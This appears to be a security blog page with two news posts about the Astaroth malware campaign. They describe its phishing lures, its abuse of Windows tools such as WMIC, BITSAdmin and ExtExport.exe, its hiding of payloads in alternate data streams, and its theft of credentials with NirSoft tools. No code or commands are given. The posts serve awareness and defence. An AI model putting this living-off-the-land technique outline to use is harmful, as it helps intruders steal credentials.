Search This Blog

Showing posts with label Astaroth. Show all posts

Windows 10 Users Beware! Astaroth Malware Campaign is Back and More Malicious!


A malware group that goes by the name of ‘Astaroth’ has re-emerged stronger and stealthier than before. This group has been known for exploiting Microsoft Windows tools to further the attack.

Microsoft had gotten aware of these methods and exposed the malware group and its “living-off-the-land” tactics. But the malware resurfaced with a hike in activity and better techniques.

Reportedly, the Windows Management Instrumentation Command-line (WMIC) is the built-in tool that got used the last time as was spotted by the Windows Defender ATP.

Per sources, the analysis done by Microsoft led to the discovery of a spam operation that spread emails with links to websites hosting a “.LNK” shortcut file which would instruct the WMIC and other Windows tools to run “fileless” malware in the memory well out of the reach of the anti-malware.

Sources indicate that having learnt from mistakes, Astaroth now entirely dodges the use of the WMIC. January and February showed a rise in activity.

According to sources, the new styled campaign still commences with a spam email comprising of a malicious website hosting link, LNK file but it the new version it employs a file attribute, “Alternate Data Streams” (ADS), that lets the attacker clip data to a file that already exists so that hiding malicious payloads gets easier.

Per source reports, the first step of the campaign which is a spam email reads, “Please find in the link below the STATEMENT #56704/2019 AND LEGAL DECISION, for due purposes”. The link is an archive file marked as, “Arquivo_PDF_.zip”.

It manipulates the ExtExport.exe to load the payload which per researchers is a valid process and an extremely unusual attack mechanism.

Once the victim clicks on the LNK file with the .zip file in it, the malware runs an obfuscated BAT command line, which releases a JavaScript file into the ‘Pictures’ folder and commands the explorer.exe that helps run the file.

Researchers mention and sources confirm that using the ADS permits the stream data to stay unidentifiable in the File Explorer, in this version Astaroth reads and decrypts plugins from ADS streams in desktop.ini that let Astaroth to rob email and browser passwords. It also unarms security software.

Per sources, the plugins are the “NirSoft WebBrowserPassView” tool is for regaining passwords and browsers and the “NirSoft MailPassView” tool is for getting back the email client passwords.

This is not the only legitimate tool Astaroth exploits. A command-line tool that goes by the name of “BITSAdmin” which aids admins to create download and upload jobs with tracking their progress is exploited to download encrypted payloads.

Reportedly, Astaroth has previously wreaked havoc on continents like Asia, North America, and Europe.

Astaroth- The Tojan That Abuses Anti-Virus Software To Steal Data




A new Trojan has surfaced which disguises itself as GIF and image files and tries to exploit the anti-virus software to harvest the data on the user’s PC.

A security research team brought the situation to everyone’s notice that this variant supposedly makes use of the modules in the cyber-security software.

The exploitation of the modules leads to the cyber-con getting hold of the victim’s data including online credentials

The Trojan in the guise of an extension-less files tries to move around the victim’s PC undetected.

By the use of spam emails and phishing messages, the victim’s lured into downloading the malicious file and then the actual Microsoft Windows BITSAdmin tool is used to download the full payload from a command-and-control (C2) server.

The malware then launches an XSL script and finalizes a channel with the C2 server. The script is obfuscated and contains functions to shroud itself from the anti-virus software.

The same script is responsible for the process which influences BITSAdmin to download payloads which include Astaroth from a different C2 server.

The old version of this Trojan used to launch a scan to look for the anti-virus programs, and in case of the presence of “Avast”, the malware used to quit.



But as it turns out with Astaroth, the antivirus software would now be abused and a malicious module would be injected into one of its processes.

The exploitation of these systems is called LOL bins, Living Off the Land binaries. GAS, an anti-fraud security program could be abused in the same way.

This Trojan first surfaced in the year 2017 in South America. It targets machines, passwords and other data. Astaroth is also capable of Keylog and could intercept calls and terminate processes.

The malware employs a “ fromCharCode() deobfuscation ” method to conceal code execution, which is an upgrade on older versions of Astaroth.

LOLbins seem to have a lot of malicious potential including stealing credentials and personal data. This method is highly attractive to cyber-cons and hence needs to be prepared against.